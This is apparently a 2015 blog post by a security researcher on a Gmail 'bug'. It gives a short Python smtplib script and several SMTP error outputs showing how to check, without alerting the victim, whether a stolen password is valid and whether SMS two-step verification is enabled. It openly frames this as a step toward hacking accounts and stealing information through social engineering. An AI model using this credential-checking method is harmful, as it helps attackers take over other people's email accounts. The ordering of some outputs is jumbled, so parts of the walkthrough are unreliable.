G3n3Rall
Google Bug: Gmail 2-Step Verification Detector
by , 05-29-2015 at 08:58 PM (0 Views)
Hello world! [ Including People , Robots, Zombies Dariush & Arash, Alien dudes if they exist, and my friends ], By the way, I decided to write about a Gmail Bug. It’s not a vulnerability of Gmail but it’s some kind of bug let us know if we hack a Gmail, we can login it or not without alert the Gmail owner. I talking about 2-Step verification, Imagine to grab a Gmail password and not be sure to login or not , victim might be use Gmail SMS auth service and when you click login, Google send victim a SMS which include a code to continue login. I got some way to test Gmail account before we login and test it if account have notification or not without any alert SMS. Keep reading to know how to do it.
As we know , Google SMTP can be used to login Gmail from anywhere .so we login from there[SMTP] and check what Gmail SMTP return to us. So now I use a python code to login my account that I activated 2-step protection on that and if anyone login, it should send me a SMS.
And when run the script my result was:PHP Code:#!/usr/bin/python2.7
#https://github.com/Ali-Razmjoo/z3r0d4y/blob/master/gmail.py
import smtplib
user = 'xxx@gmail.com'
passw = 'xxx'
smtp_host = 'smtp.gmail.com'
smtp_port = 587
server = smtplib.SMTP()
server.connect(smtp_host,smtp_port)
server.ehlo()
server.starttls()
server.login(user,passw)
Ohhh , Greate , because it’s just showing me check out app password url and didn’t send me any SMS. So it means my password is not wrong ! But to be sure I’m going to test this with wrong password.PHP Code:Traceback (most recent call last):
File "C:\Users\Ali\Desktop\gmail.py", line 22, in <module>
server.login(user,passw)
File "C:\Python27\lib\smtplib.py", line 614, in login
raise SMTPAuthenticationError(code, resp)
smtplib.SMTPAuthenticationError: (534, '5.7.9 Application-specific password requ
ired. Learn more at\n5.7.9 http://support.google.com/accounts/bin/answer.py?answ
er=185833 w3sm2453216wjf.3 - gsmtp')
</module>
Now you can see different result. And let me test it with another Gmail which for a long time I didn’t use.PHP Code:Traceback (most recent call last):
File "C:\Users\Ali\Desktop\gmail.py", line 22, in <module>
a = server.login(user,passw)
File "C:\Python27\lib\smtplib.py", line 614, in login
raise SMTPAuthenticationError(code, resp)
smtplib.SMTPAuthenticationError: (535, '5.7.8 Username and Password not accepted
. Learn more at\n5.7.8 http://support.google.com/mail/bin/answer.py?answer=14257
bv6sm2577733wjb.30 - gsmtp')
</module>
Now Google tells me use the browser to login. I don’t care about error. But there’s a point! What if we use a Gmail account which we didn’t ever use on my PC till now. So I will use my friend’s Gmail account and watch the result.PHP Code:Traceback (most recent call last):
File "C:\Users\Ali\Desktop\gmail.py", line 22, in <module>
a = server.login(user,passw)
File "C:\Python27\lib\smtplib.py", line 614, in login
raise SMTPAuthenticationError(code, resp)
smtplib.SMTPAuthenticationError: (534, '5.7.14 <https: -ykrwwgn7pth55a1tqk3e1gfitbhkmghsuw="" 4agnsmz6qasoci8_lqhs6mclnixpgqw_ops="" accounts.google.com="" dlg2yvdj_qzprqrv_i0l82hy22kcvuvdwscq="" enwfs-dk6nrjrf_thrthuzs555kifmnkek="" inuesignin="" n5.7.14="" ont="" pntqhm8pgwhqork6g4jaqbl5rcyk91sfb3="" sarp="1&scc=1&plt=AKgnsbu3u\n5.7.14" szjzlgqcf2y3wxgua9voyex8kmlf-laboneg="" wueyxesepgpc6rgqcwl9pfo4kwtg=""> Please
log in via your web browser and\n5.7.14 then try again.\n5.7.14 Learn more at\n5
.7.14 https://support.google.com/mail/bin/answer.py?answer=78754 bv6sm2501216wjb
.30 - gsmtp')
</https:></module>
It seems my friend’s been given me true password but he activated Gmail SMS auth. So now we can see that Google didn’t work hard on this way. When we have true password, we can login and steal information and if victim using Gmail SMS auth, however, we know what’s the true password and only need a little social engineering to login and steal information. All we need now it’s a script to make it automatic check the Gmail account to login with this script and read error to see what happen. If you think I’m going to make a automatic script for you, and put code here, I should tell you that, I am NOT.PHP Code:Traceback (most recent call last):
File "C:\Users\Ali\Desktop\gmail.py", line 22, in <module>
a = server.login(user,passw)
File "C:\Python27\lib\smtplib.py", line 614, in login
raise SMTPAuthenticationError(code, resp)
smtplib.SMTPAuthenticationError: (534, '5.7.9 Application-specific password requ
ired. Learn more at\n5.7.9 http://support.google.com/accounts/bin/answer.py?answ
er=185833 bo3sm2561309wjb.44 - gsmtp')
</module>
Reference
ZCR Zeroday Cyber Research
Ali Razmjoo
Go to Profile
Mark as Read
